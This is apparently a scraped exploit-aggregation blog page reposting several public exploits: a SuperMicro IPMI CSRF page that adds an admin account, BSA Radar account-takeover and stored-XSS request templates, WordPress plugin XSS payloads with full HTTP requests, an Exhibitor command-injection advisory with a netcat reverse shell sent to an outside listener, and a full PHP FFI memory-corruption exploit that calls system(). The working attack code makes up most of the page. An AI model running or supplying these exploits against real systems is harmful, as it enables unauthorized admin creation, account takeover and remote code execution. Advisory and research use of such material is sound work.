# Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.supermicro.com/
# Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and
# IPMI firmware 03.40
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to
add new admin users.
# The fixed versions are BIOS 3.2 and firmware 03.88.
# PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
<input type="hidden" name="username" value="JOKER" />
<input type="hidden" name="original_username" value="2" />
<input type="hidden" name="password" value="onebadday" />
<input type="hidden" name="new_privilege" value="4" />
<input type="submit" value="submit request" />
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863178100
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit title: BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)
# Exploit Author: William Summerhill
# Date: 2020-06-22
# Vendor Homepage:bhttps://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE: CVE-2020-14944
# Description: The Global RADAR BSA Radar 1.6.7234.X application lacks valid authorization
# controls in multiple functions while logged into the application.
# This can allow for manipulation and takeover of user accounts if successfully exploited.
# The following vulnerable functions are exposed: ChangePassword, SaveUserProfile, GetUser
Proof of Concept:
1. ChangePassword API endpoint - Allows the ability to update the password belonging to another account by their UserID, and therefore leading to account takeover.
HTTP Request PoC:
POST /WS/AjaxWS.asmx/ChangePassword
{"password":
{"UserID":XXXX,"NewPassword":"NEWPASSHERE","NewPasswordConfirm":"NEWPASSHERE",<REMAINDER OF REQUEST HERE>} }
The UserID and NewPassword parameters can be forged to force the password change of another existing user account by using their UserID.
2. SaveUserProfile API endpoint - Allows the ability to update the user profile belonging to another account by using their UserID. This includes modifiable details like first name, last name, email, and phone number. This also allows for injection of a Stored Cross-Site Scripting (XSS) into arbitrary user account profiles as the first name and last name parameters are vulnerable. This can allow for session hijacking, stealing application data or redirecting users to attacker-controlled applications for phishing attacks.
HTTP Request PoC:
POST /WS/AjaxWS.asmx/SaveUserProfile
{"user":
{"UserID":XXXX,"BankID":XXX,"Firstname":<ARBITRARY INPUT HERE OR STORED XSS SCRIPT>","Lastname":"<ARBITRARY INPUT HERE OR STORED XSS SCRIPT>","Title":"","Phone":"<ARBITRARY INPUT HERE>","Email":"<Correct email here>",<REMAINDER OF REQUEST HERE>} }
Multiple paramaters above can be forged and modified for existing UserID accounts. The Firstname and Lastname parameters are vulnerable to a stored XSS attack which can be used to inject malicious scripts into existing user accounts to steal sessions or account data, or to redirect users to malicious pages.
3. GetUser API endpoint - Allows the ability to view the user account details of any arbitrary user by enumerating their UserID.
HTTP Request PoC:
POST /WS/AjaxWS.asmx/GetUser
{"userID":XXXX }
The UserID paramter can be forged to enumerate over existing userID's in order to return their account details such as full name, username, user permissions, account role, email, and password question.
Tested on: Windows
CVE: CVE-2020-14944
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14944
# Exploit Title: Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting
# Date: 2020-07-07
# Vendor Homepage: https://powie.de
# Vendor Changelog: https://wordpress.org/plugins/powies-whois/#developers
# Software Link: https://wordpress.org/plugins/powies-whois/
# Exploit Author: mqt
# Author Homepage: https://blog.haao.sh
1. Description
Powie's WHOIS Wordpress plugin was found to be vulnerable to Stored XSS as
multiple fields in the plugin's setup settings fail to properly sanitize
user input. The risk here is mitigated due to the fact that active
exploitation would require authentication. However a lower privileged
Wordpress user would be able to take advantage of the fact that the
arbitrary Javascript executes on the same origin and therefore by using a
specially crafted payload, an attacker would be able to elevate their
privileges or take any of the same actions an admin would be able to.
All Wordpress websites using Powie's WHOIS version < 0.9.31 are vulnerable.
2. Vulnerability
There are two sets of vulnerable fields with each requiring a different
payload in order exploit.
The first set of vulnerable fields display output using the `<textarea>`
element.
Show on available domains (display-on-free)
Show on unavailable domains (display-on-connect)
Show on invalid domain (display-on-valid)
As no sanitization is being performed, an attacker can use a closing
`</textarea>` tag to close the HTML element and thus is able to inject
arbitrary Javascript.
Vulnerable Code: (/plugins/powies-whois/pwhois_settings.php)
<tr valign="top">
<th scope="row"><?php _e('Show on available domains', 'powies-whois')
?></th>
<td><textarea rows="3" name="display-on-free" style="width:100%;"><?php
echo get_option('display-on-free'); ?></textarea></td>
</tr>
<tr valign="top">
<th scope="row"><?php _e('Show on unavailable domains', 'powies-whois')
?></th>
td><textarea rows="3" name="display-on-connect"
style="width:100%;"><?php echo get_option('display-on-connect');
?></textarea></td>
</tr>
<tr valign="top">
<th scope="row"><?php _e('Show on invalid domain', 'powies-whois')
?></th>
<td><textarea rows="3" name="display-on-invalid"
style="width:100%;"><?php echo get_option('display-on-invalid');
?></textarea></td>
</tr>
Payload: </textarea><img src=/ onerror=alert(1)>
Vulnerable HTTP Request:
POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0)
Gecko/20100101 Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/wp-admin/options-general.php?page=powies-whois%2Fpwhois_settings.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 479
Origin: http://localhost
Connection: close
Cookie: <snipped for brevity>
Upgrade-Insecure-Requests: 1
option_page=pwhois-settings&action=update&_wpnonce=e632f68003&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpowies-whois%252Fpwhois_settings.php%26settings-updated%3Dtrue&show-whois-output=1&display-on-free=%3C%2Ftextarea%3E%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&display-on-connect=%3C%2Ftextarea%3E%3Cimg+src%3D%2F+onerror%3Dalert%282%29%3E&display-on-invalid=%3C%2Ftextarea%3E%3Cimg+src%3D%2F+onerror%3Dalert%283%29%3E&before-whois-output=&after-whois-output=
The second set of vulnerable fields display output using the <input>
element, specifically in the value attribute. As no sanitization is
performed, an attacker is able to use specially crafted input to escape the
value attribute and thus have the ability to inject arbitrary Javascript.
Vulnerable Code: (/plugins/powies-whois/pwhois_settings.php)
<tr valign="top">
<th scope="row"><?php _e('HTML before whois output', 'powies-whois')
?></th>
<td><input type="text" name="before-whois-output" value="<?php echo
get_option('before-whois-output'); ?>" style="width:100%;" /></td>
</tr>
<tr valign="top">
<th scope="row"><?php _e('HTML after whois output', 'powies-whois')
?></th>
<td><input type="text" name="after-whois-output" value="<?php echo
get_option('after-whois-output'); ?>" style="width:100%;"/></td>
</tr>
Payload: "><img src=/ onerror=alert(1)>
Vulnerable HTTP Request:
POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0)
Gecko/20100101 Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/wp-admin/options-general.php?page=powies-whois%2Fpwhois_settings.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 398
Origin: http://localhost
Connection: close
Cookie: <snipped for brevity>
Upgrade-Insecure-Requests: 1
option_page=pwhois-settings&action=update&_wpnonce=e632f68003&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpowies-whois%252Fpwhois_settings.php%26settings-updated%3Dtrue&show-whois-output=1&display-on-free=&display-on-connect=&display-on-invalid=&before-whois-output=%22%3E%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&after-whois-output=%22%3E%3Cimg+src%3D%2F+onerror%3Dalert%282%29%3E
# Exploit Title: Exhibitor Web UI 1.7.1 - Remote Code Execution
# Date: 2019-11-13
# Exploit Author: Logan Sanderson
# Web Site: https://github.com/soabase/exhibitor/wiki/Running-Exhibitor
# Version : 1.7.1
# CVE : CVE-2019-5029
Exhibitor UI command injection vulnerability
November 13, 2019
CVE Number
CVE-2019-5029
Summary
An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.
Tested Versions
Tested version was compiled using the standalone pom.xml from the Exhibitor master branch.
(Note that the latest released version is labeled 1.7.1, but the version in the exhibitor-standalone’s pom.xml is set to 1.6.0.)
The vulnerability should affect all versions at least as far back as 1.0.9, when the javaEnvironment variable was added.
Product URLs
https://github.com/soabase/exhibitor
CVSSv3 Score
9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-78 - Improper Neutralization of Special Elements used in an OS Command
Details
Exhibitor is a ZooKeeper supervisory process, which is described in the ZooKeeper documentation.
Since the ZooKeeper server will exit on an error, the Apache ZooKeeper documentation suggests a supervisory process that manages the ZooKeeper server process, mainly for the purpose of restarting ZooKeeper when it exits.
Exhibitor’s Web UI does not have any form of authentication, and prior to version 1.7.0, did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the changing of the ZooKeeper configuration, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper.
By default, the Exhibitor Web UI listens on TCP 8080. However, since this port is commonly used, it may be common to find it on other ports as well.
Under the Config tab in the Exhibitor Web UI, the “java.env script” field can be modified and the new configuration pushed to ZooKeeper. Exhibitor launches ZooKeeper through a script, and the contents of this field are passed, unmodified, as arguments to the Java command to launch ZooKeeper, which can be seen here.
(The contents of the “java.env script” field are passed in as $JVMFLAGS.)
Based on how this argument is passed, there are several ways to execute arbitrary commands. The methods tested were surrounding the command with backticks and using $(), for example:
$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
This example uses netcat to open a reverse shell to a listener on 10.0.0.64:4444.
In the example, ZooKeeper will still launch successfully after the command executes, and it will run the command every time ZooKeeper is re-launched by Exhibitor.
Exploit Proof of Concept
The included screenshots show the process of obtaining a root shell on the system.
The steps to exploit it from a web browser:
Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
In the “java.env script” field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:
$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
Click Commit > All At Once > OK
The command may take up to a minute to execute.
It can also be performed with a single curl command:
command: curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set
data.json: { “zookeeperInstallDirectory”: “/opt/zookeeper”, “zookeeperDataDirectory”: “/opt/zookeeper/snapshots”, “zookeeperLogDirectory”: “/opt/zookeeper/transactions”, “logIndexDirectory”: “/opt/zookeeper/transactions”, “autoManageInstancesSettlingPeriodMs”: “0”, “autoManageInstancesFixedEnsembleSize”: “0”, “autoManageInstancesApplyAllAtOnce”: “1”, “observerThreshold”: “0”, “serversSpec”: “1:exhibitor-demo”, “javaEnvironment”: “$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)”, “log4jProperties”: “”, “clientPort”: “2181”, “connectPort”: “2888”, “electionPort”: “3888”, “checkMs”: “30000”, “cleanupPeriodMs”: “300000”, “cleanupMaxFiles”: “20”, “backupPeriodMs”: “600000”, “backupMaxStoreMs”: “21600000”, “autoManageInstances”: “1”, “zooCfgExtra”: { “tickTime”: “2000”, “initLimit”: “10”, “syncLimit”: “5”, “quorumListenOnAllIPs”: “true” }, “backupExtra”: { “directory”: “” }, “serverId”: 1 }
Mitigation
Since Exhibitor has no built-in authentication, it would be helpful to limit the interfaces it listens on to only trusted networks, or require authentication using something like an nginx reverse proxy and block all other access using firewall rules.
If the features provided by the Exhibitor Web UI are not needed and the only needed functionality is managing the ZooKeeper process, it should be replaced with a simpler ZooKeeper supervisor solution, such as a systemd service.
Timeline
2019-03-08 - Vendor Disclosure
2019-05-01 - GitHub issue #389 created; Vendor advised point of contact changed. Copy of report sent to new point of contact
2019-05-14 - (75 day) 3rd follow up with vendor
2019-05-29 - Final notice of public disclosure release
2019-11-13 - Public Release
Credit
Discovered by Logan Sanderson of Cisco ASIG.
<?php
/*
FFI Exploit - uses 3 potential BUGS.
PHP was contacted and said nothing in FFI is a security issue.
Able to call system($cmd) without using FFI::load() or FFI::cdefs()
* BUG #1 (maybe intended, but why have any size checks then?)
no bounds check for FFI::String() when type is ZEND_FFI_TYPE_POINTER
(https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4411)
* BUG #2 (maybe intended, but why have any checks then?)
no bounds check for FFI::memcpy when type is ZEND_FFI_TYPE_POINTER
(https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4286)
* BUG #3
Can walk back CDATA object to get a pointer to its internal reference pointer using FFI::addr()
call FFI::addr on a CDATA object to get its pointer (also a CDATA object), then call FFI::addr
on the resulting ptr to get a handle to it's ptr, which is the ptr_holder for the original CDATA
object
the easiest way is to create cdata object, write target RIP (zif_system's address) to it
and finally modify it's zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it
Exploit steps:
1. Use read/write to leak zif_system pointer
a. walk cdata object to leak handlers pointer ( in .bss )
b. scan .bss for pointer to a known value ( *.rodata ptr), that we know usually sits
right below a pointer to the .data.relro segment
c. Increment and read the .data.relro pointer to get a relro section leak
d. Using the relro section leak, scan up memory looking for the 'system' string that is
inside the zif_system relro entry.
e. once found, increment and leak the zif_system pointer
2. Hijack RIP with complete argument control
a. create a function pointer CDATA object using FFI::new() [not callable as it is
technically not a propper ZEND_FFI_TYPE_FUNC since it wasnt made with FFI::cdef()
b. Overwrite the object'd data with zif_system pointer
c. Overwrite the objects zend_ffi_type_kind with ZEND_FFI_TYPE_FUNC so that it is
callable with our own arguments
3. Create proper argument object to pass to zif_system (zend_execute_data .. )
a. Build out the zend_execute_data object in a php string
b. right after the object is the argument object itself (zval) which we must also
build. To do so we build our PHP_STRING in another FFI buffer, leak the pointer
and place it into a fake zval STRING object.
c. finally we can call zif_system with a controlled argument
NOTE: does NOT exit cleanly nor give command output -- both may be possible
Author: Hunter Gregal
Tested on:
- PHP 7.4.7 x64 Ubuntu 20, ./confiure --disable-all --with-ffi
- PHP 7.4.3 x64 Ubuntu 20 (apt install)
*/
ini_set("display_errors", "On");
error_reporting(E_ALL);
function pwn($cmd) {
function allocate($amt, $fill) {
// could do $persistent = TRUE to alloc on libc malloc heap instead
// but we already have a good read/write primitive
// and relying on libc leaks for gadgets is not very portable
// (custome compiled libc -> see pornhub php 0-day)
$buf = FFI::new("char [".$amt."]");
$bufPtr = FFI::addr($buf);
FFI::memset($bufPtr, $fill, $amt);
// not sure if i need to keep the CData reference alive
// or not - but just in case return it too for now
return array($bufPtr, $buf);
}
// uses leak to leak data from FFI ptr
function leak($ptr, $n, $hex) {
if ( $hex == 0 ) {
return FFI::string($ptr, $n);
} else {
return bin2hex(FFI::string($ptr, $n));
}
}
function ptrVal($ptr) {
$tmp = FFI::cast("uint64_t", $ptr);
return $tmp->cdata;
}
/* Read primative
writes target address overtop of CDATA object pointer,
then leaks directly from the CDATA object
*/
function Read($addr, $n = 8, $hex = 0) {
// Create vulnBuf which we walk back to do the overwrite
// (the size and contents dont really matter)
list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8
// walk back to get ptr to ptr (heap)
$vulnBufPtrPtr = FFI::addr($vulnBufPtr);
/*// DEBUG
$vulnBufPtrVal = ptrVal($vulnBufPtr);
$vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr);
printf("vuln BufPtr = %s\n", dechex($vulnBufPtrVal));
printf("vuln BufPtrPtr = %s\n", dechex($vulnBufPtrPtrVal));
printf("-------\n\n");
*/
// Overwrite the ptr
$packedAddr = pack("Q",$addr);
FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8);
// Leak the overwritten ptr
return leak($vulnBufPtr, $n, $hex);
}
/* Write primative
writes target address overtop of CDATA object pointer,
then writes directly to the CDATA object
*/
function Write($addr, $what, $n) {
// Create vulnBuf which we walk back to do the overwrite
// (the size and contents dont really matter)
list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8
// walk back to get ptr to ptr (heap)
$vulnBufPtrPtr = FFI::addr($vulnBufPtr);
/*// DEBUG
$vulnBufPtrVal = ptrVal($vulnBufPtr);
$vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr);
printf("vuln BufPtr = %s\n", dechex($vulnBufPtrVal));
printf("vuln BufPtrPtr = %s\n", dechex($vulnBufPtrPtrVal));
printf("-------\n\n");
*/
// Overwrite the ptr
$packedAddr = pack("Q",$addr);
FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8);
// Write to the overwritten ptr
FFI::memcpy($vulnBufPtr, $what, $n);
}
function isPtr($knownPtr, $testPtr) {
if ( ($knownPtr & 0xFFFFFFFF00000000) == ($testPtr & 0xFFFFFFFF00000000)) {
return 1;
} else {
return 0;
}
}
/* Walks looking for valid pointers
* - each valid ptr is read and if it
- points to the target return the address of the
- ptr and the location it was found
*/
//function getRodataAddr($bssLeak) {
function walkSearch($segmentLeak, $maxQWORDS, $target, $size = 8, $up = 0) {
$start = $segmentLeak;
for($i = 0; $i < $maxQWORDS; $i++) {
if ( $up == 0 ) { // walk 'down' addresses
$addr = $start - (8 * $i);
} else { // walk 'up' addresses
$addr = $start + (8 * $i);
}
//$leak = Read($addr, 8);
$leak = unpack("Q", Read($addr))[1];
// skip if its not a valid pointer...
if ( isPtr($segmentLeak, $leak) == 0 ) {
continue;
}
$leak2 = Read($leak, $n = $size);
//printf("0x%x->0x%x = %s\n", $addr, $leak, $leak2);
if( strcmp($leak2, $target) == 0 ) { # match
return array ($leak, $addr);
}
}
return array(0, 0);
}
function getBinaryBase($textLeak) {
$start = $textLeak & 0xfffffffffffff000;
for($i = 0; $i < 0x10000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = Read($addr, 7);
//if($leak == 0x10102464c457f) { # ELF header
if( strcmp($leak, "\x7f\x45\x4c\x46\x02\x01\x01") == 0 ) { # ELF header
return $addr;
}
}
return 0;
}
function parseElf($base) {
$e_type = unpack("S", Read($base + 0x10, 2))[1];
$e_phoff = unpack("Q", Read($base + 0x20))[1];
$e_phentsize = unpack("S", Read($base + 0x36, 2))[1];
$e_phnum = unpack("S", Read($base + 0x38, 2))[1];
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = unpack("L", Read($header, 4))[1];
$p_flags = unpack("L", Read($header + 4, 4))[1];
$p_vaddr = unpack("Q", Read($header + 0x10))[1];
$p_memsz = unpack("Q", Read($header + 0x28))[1];
if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function getBasicFuncs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = unpack("Q", Read($data_addr+ ($i * 8)))[1];
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = unpack("Q", Read($leak))[1];
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = unpack("Q", Read($data_addr + (($i + 4) * 8)))[1];
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = unpack("Q", Read($leak))[1];
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function getSystem($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = unpack("Q", Read($addr))[1];
$f_name = Read($f_entry, 6) . "\0";
if( strcmp($f_name, "system\0") == 0) { # system
return unpack("Q", Read($addr + 8))[1];
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
// Convenient for debugging
function crash() {
Write(0x0, "AAAA", 4);
}
printf("\n[+] Starting exploit...\n");
// --------------------------- start of leak zif_system address
/* NOTE: typically we would leak a .text address and
walk backwards to find the ELF header. From there we can parse
the elf information to resolve zif_system - in our case the
base PHP binary image with the ELF head is on its own mapping
that does not border the .text segment. So we need a creative
way to get zif_system
*/
/* ---- First, we use our read to walk back to the our Zend_object,
// and get its zend_object_handlers* which will point to the
// php binary symbols zend_ffi_cdata_handlers in the .bss.
//
//_zend_ffi_cdata.ptr-holder - _zend_ffi_cdata.ptr.std.handlers == 6 QWORDS
//
// From there we search for a ptr to a known value (happens to be to the .rodata section)
// that just so happens to sit right below a ptr to the 'zend_version' relro entry.
// So we do some checks on that to confirm it is infact a valid ptr to the .data.relro.
//
// Finally we walk UP the relro entries looking for the 'system' (zif_system) entry.
(zend_types.h)
struct _zend_object { <-----typdef zend_object
zend_refcounted_h gc;
uint32_t handle; // may be removed ???
end_class_entry *ce;
const zend_object_handlers *handlers; <--- func ptrs
HashTable *properties;
zval properties_table[1];
};
(ffi.c)
typedef struct _zend_ffi_cdata {
zend_object std;
zend_ffi_type *type;
void *ptr; <--- OVERWRITE
void *ptr_holder; <--
zend_ffi_flags flags;
} zend_ffi_cdata;
*/
list($dummyPtr, $dummy) = allocate(64, 0x41);
// dummy buf ptr
$dummyPtrVal = ptrVal($dummyPtr);
// dummy buf ptr ptr
$dummyPtrPtr = FFI::addr($dummyPtr);
$dummyPtrPtrVal = ptrVal($dummyPtrPtr);
printf("Dummy BufPtr = 0x%x\n", $dummyPtrVal);
printf("Dummy BufPtrPtr = 0x%x\n", $dummyPtrPtrVal);
$r = leak($dummyPtr, 64, 1);
printf("Dummy buf:\n%s\n", $r);
printf("-------\n\n");
/*
// ------ Test our read and write
$r = Read($dummyPtrVal, 256, 1);
printf("Read Test (DummyBuf):\n%s\n", $r);
Write($dummyPtrVal, "CCCCCCCC", 8);
$r = Read($dummyPtrVal, 256, 1);
printf("Write Test (DummyBuf):\n%s\n", $r);
// ----------
*/
$handlersPtrPtr = $dummyPtrPtrVal - (6 * 8);
printf("_zend_ffi_cdata.ptr.std.handlers = 0x%x\n", $handlersPtrPtr);
$handlersPtr = unpack("Q", Read($handlersPtrPtr))[1]; // --> zend_ffi_cdata_handlers -> .bss
printf("zend_ffi_cdata_handlers = 0x%x\n", $handlersPtr);
// Find our 'known' value in the .rodata section -- in this case 'CORE'
// (backup can be 'STDIO)'
list($rodataLeak, $rodataLeakPtr) = walkSearch($handlersPtr, 0x400,"Core", $size=4);
if ( $rodataLeak == 0 ) {
// If we failed let's just try to find PHP's base and hope for the best
printf("Get rodata addr failed...trying for last ditch effort at PHP's ELF base\n");
// use .txt leak
$textLeak = unpack("Q", Read($handlersPtr+16))[1]; // zned_objects_destroy_object
printf(".textLeak = 0x%x\n", $textLeak);
$base = getBinaryBase($textLeak);
if ( $base == 0 ) {
die("Failed to get binary base\n");
}
printf("BinaryBase = 0x%x\n", $base);
// parse elf
if (!($elf = parseElf($base))) {
die("failed to parseElf\n");
}
if (!($basicFuncs = getBasicFuncs($base, $elf))) {
die("failed to get basic funcs\n");
}
if (!($zif_system = getSystem($basicFuncs))) {
die("Failed to get system\n");
}
// XXX HERE XXX
//die("Get rodata addr failed\n");
} else {
printf(".rodata leak ('CORE' ptr) = 0x%x->0x%x\n", $rodataLeakPtr, $rodataLeak);
// Right after the "Core" ptrptr is zend_version's relro entry - XXX this may not be static
// zend_version is in .data.rel.ro
$dataRelroPtr = $rodataLeakPtr + 8;
printf("PtrPtr to 'zend_verson' relro entry: 0x%x\n", $dataRelroPtr);
// Read the .data.relro potr
$dataRelroLeak = unpack("Q", Read($dataRelroPtr))[1];
if ( isPtr($dataRelroPtr, $dataRelroLeak) == 0 ) {
die("bad zend_version entry pointer\n");
}
printf("Ptr to 'zend_verson' relro entry: 0x%x\n", $dataRelroLeak);
// Confirm this is a ptrptr to zend_version
$r = unpack("Q", Read($dataRelroLeak))[1];
if ( isPtr($dataRelroLeak, $r) == 0 ) {
die("bad zend_version entry pointer\n");
}
printf("'zend_version' string ptr = 0x%x\n", $r);
$r = Read($r, $n = 12);
if ( strcmp($r, "zend_version") ) {
die("Failed to find zend_version\n");
}
printf("[+] Verified data.rel.ro leak @ 0x%x!\n", $dataRelroLeak);
/* Walk FORWARD the .data.rel.ro segment looking for the zif_system entry
- this is a LARGE section...
*/
list($systemStrPtr, $systemEntryPtr) = walkSearch($dataRelroLeak, 0x3000, "system", $size = 6, $up =1);
if ( $systemEntryPtr == 0 ) {
die("Failed to find zif_system relro entry\n");
}
printf("system relro entry = 0x%x\n", $systemEntryPtr);
$zif_systemPtr = $systemEntryPtr + 8;
$r = unpack("Q", Read($zif_systemPtr))[1];
if ( isPtr($zif_systemPtr, $r) == 0 ) {
die("bad zif_system pointer\n");
}
$zif_system = $r;
}
printf("[+] zif_system @ 0x%x\n", $zif_system);
// --------------------------- end of leak zif_system address
// --------------------------- start call zif_system
/* To call system in a controlled manner
the easiest way is to create cdata object, write target RIP (zif_system's address) to it
and finally modify it's zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it
*/
$helper = FFI::new("char* (*)(const char *)");
//$helper = FFI::new("char* (*)(const char *, int )"); // XXX if we want return_val control
$helperPtr = FFI::addr($helper);
//list($helperPtr, $helper) = allocate(8, 0x43);
//$x[0] = $zif_system;
$helperPtrVal = ptrVal($helperPtr);
$helperPtrPtr = FFI::addr($helperPtr);
$helperPtrPtrVal = ptrVal($helperPtrPtr);
printf("helper.ptr_holder @ 0x%x -> 0x%x\n", $helperPtrPtrVal, $helperPtrVal);
// Walk the type pointers
//$helperObjPtr = $helperPtrPtrVal - (9 *8); // to top of cdata object
//printf("helper CDATA object @ 0x%x\n", $helperObjPtr);
$helperTypePtrPtr = $helperPtrPtrVal - (2 *8); // 2 DWORDS up the struct to *type ptr
//printf("helper CDATA type PtrPtr @ 0x%x\n", $helperTypePtrPtr);
$r = unpack("Q", Read($helperTypePtrPtr))[1];
if ( isPtr($helperTypePtrPtr, $r) == 0 ) {
die("bad helper type pointer\n");
}
$helperTypePtr = $r;
// Confirm it's currently ZEND_FFI_TYPE_VOID (0)
$r = Read($helperTypePtr, $n=1, $hex=1);
if ( strcmp($r, "00") ) {
die("Unexpected helper type!\n");
}
printf("Current helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_VOID (0)\n", $helperTypePtrPtr, $helperTypePtr);
// Set it to ZEND_FFI_TYPE_FUNC (16 w/ HAVE_LONG_DOUBLE else 15)
Write($helperTypePtr, "\x10", 1);
printf("Swapped helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_FUNC (16)\n", $helperTypePtrPtr, $helperTypePtr);
// Finally write zif_system to the value
Write($helperPtrVal, pack("Q", $zif_system), 8);
// --------------------------- end of leak zif_system address
// ----------------------- start of build zif_system argument
/*
zif_system takes 2 args -> zif_system(*zend_execute_data, return_val)
For now I don't bother with the return_val, although tehnically we could control
it and potentially exit cleanly
*/
// ----------- start of setup zend_execute_data object
/* Build valid zend_execute object
struct _zend_execute_data {
const zend_op *opline; /* executed opline
zend_execute_data *call; /* current call
zval *return_value;
zend_function *func; /* executed function
zval This; /* this + call_info + num_args
zend_execute_data *prev_execute_data;
zend_array *symbol_table;
void **run_time_cache; /* cache op_array->run_time_cache
}; //0x48 bytes
*/
//This.u2.num_args MUST == our number of args (1 or 2 apparantly..) [6 QWORD in execute_data]
$execute_data = str_shuffle(str_repeat("C", 5*8)); // 0x28 C's
$execute_data .= pack("L", 0); // this.u1.type
$execute_data .= pack("L", 1); // this.u2.num_args
$execute_data .= str_shuffle(str_repeat("A", 0x18)); // fill out rest of zend_execute obj
$execute_data .= str_shuffle(str_repeat("D", 8)); //padding
// ----------- end of setup zend_execute_data object
// ----------- start of setup argument object
/* the ARG (zval) object lays after the execute_data object
zval {
value = *cmdStr ([16 bytes] + [QWORD string size] + [NULL terminated string])
u1.type = 6 (IS_STRING)
u2.???? = [unused]
}
*/
/*
// Let's get our target command setup in a controlled buffer
// TODO - use the dummy buf?
// the string itself is odd. it has 16 bytes prepended to it that idk what it is
// the whole argument after the zend_execute_data object looks like
*/
$cmd_ = str_repeat("X", 16); // unk padding
$cmd_ .= pack("Q", strlen($cmd)); // string len
$cmd_ .= $cmd . "\0"; // ensure null terminated!
list($cmdBufPtr, $cmdBuf) = allocate(strlen($cmd_), 0);
$cmdBufPtrVal = ptrVal($cmdBufPtr);
FFI::memcpy($cmdBufPtr, $cmd_, strlen($cmd_));
printf("cmdBuf Ptr = 0x%x\n", $cmdBufPtrVal);
// Now setup the zval object itself
$zval = pack("Q", $cmdBufPtrVal); // zval.value (pointer to cmd string)
$zval .= pack("L", 6); // zval.u1.type (IS_STRING [6])
$zval .= pack("L", 0); // zval.u2 - unused
$execute_data .= $zval;
// ---------- end of setup argument object
// ----------------------- start of build zif_system argument
$res = $helper($execute_data);
